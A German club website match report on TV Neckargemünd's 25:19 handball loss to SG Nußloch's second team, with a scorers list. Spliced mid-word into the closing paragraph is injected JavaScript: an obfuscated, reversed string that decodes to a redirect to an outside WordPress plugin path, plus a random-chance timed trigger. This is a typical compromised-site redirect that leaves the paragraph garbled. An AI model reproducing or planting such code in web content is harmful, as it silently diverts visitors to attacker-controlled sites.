Stark geschwächter TVN unterliegt trotz guter Leistung

Vergangenen Samstag reiste der TV Neckargemünd stark ersatzgeschwächt zum zweiten Auswärtsspiel der Saison und unterlag der 2. Herrenmannschaft des SG Nußloch mit 25:19 (11:10). 

Ohne verletzungsbedingte sechs Spieler trat der TVN, am späten Samstagabend, mit lediglich 2 Torhütern und 6 Feldspieler bei der Verbandsligareserve der SG Nußloch an. Der Beginn des Spiels verlief für beide Mannschaften sehr unruhig. Viele Fehler bestimmten die jeweiligen Angriffsbemühungen. So stand es nach rund 20 Spielminuten lediglich 5:5.
Nachdem die Hausherren mit voller Reservebank neue Kräfte ins Spiel brachten, belebte dies die Offensive. Der TVN hielt jedoch aus einer stabilen Abwehr und mit Stefan Pfirmann, einem sehr guten Rückhalt im Tor, weiterhin sehr gut dagegen. Somit ging es mit einem Spielstand von 11:10 in die Halbzeitpause.

Der TVN wollte, weiterhin aus einer guten Abwehrleistung heraus, es den Nußlochern schwer machen zu ihrem Spiel zu finden. Nach 40 gespielten Minuten ließen hier jedoch merklich die Kräfte nach, der berühmte Schritt zu langsam, gewann immer mehr an Bedeutung. Deshalb schaffte es die Heimmannschaft sich innerhalb von 4 Minuten deutlich auf 20:14 abzusetzen. Ab diesem Zeitpunkt war klar, dass kaum eine Chance auf Punkte in mehr in Aussicht steht. Jedoch lies die Mannschaft des TVN nie die Köpfe hängen und zeigte in den letzten 15 Spielminuten, dass man mit dem Gegner mithalten konnte. Der 6 Tore Rückstand wurde bis zum Ende aufrecht erhalten, teilweise konnte sogar kurzfristig verkürzt werden.

Trotz der Niederlage und ohne formalen Auswechselspieler im Feld ist man mit dieser Leistung sehr zufrieden. Ein großer Dank gilt Florian Krawetz, der sich erneut als eigentlicher Torwart bereit erklärte, der Mannschaft im Feld als einziger Wechselspieler einen großen Dienst zu erweisen. Ebenfalls wünschen wir all unseren Verletzten und Kranken Mannschaftskollegen gute Besserung, wir freuen uns, wenn alle in den kommenden Wochen wieder zu uns stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toßen.

Torschützen:

SG Nußloch – TV Neckargemünd: 25:19

SG Nußloch: Lukas Förch (8), Tim Homma (4), Marius Müller (3), Moritz Grünwedel (3), Endrit Gashaj (2), Jannik Wolf (1), Max Werner (1), Lars Herb (1), Hannes Haag (1), Michael Busch (1), Paul Werner, Sven Sitter, Tobias Niemtschak, Florian Müller
Trainer: Martin Seiler

TV Neckargemünd: Sebastian Mohr (12), Alexander Herd (4), Philip Ter Haak (1), Alexander Stephan (1), Johannes Hünnerkopf (1), Stephan Pfirmann, Julius Nicolai, Florian Krawetz
Trainer: Alexander Kammler

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert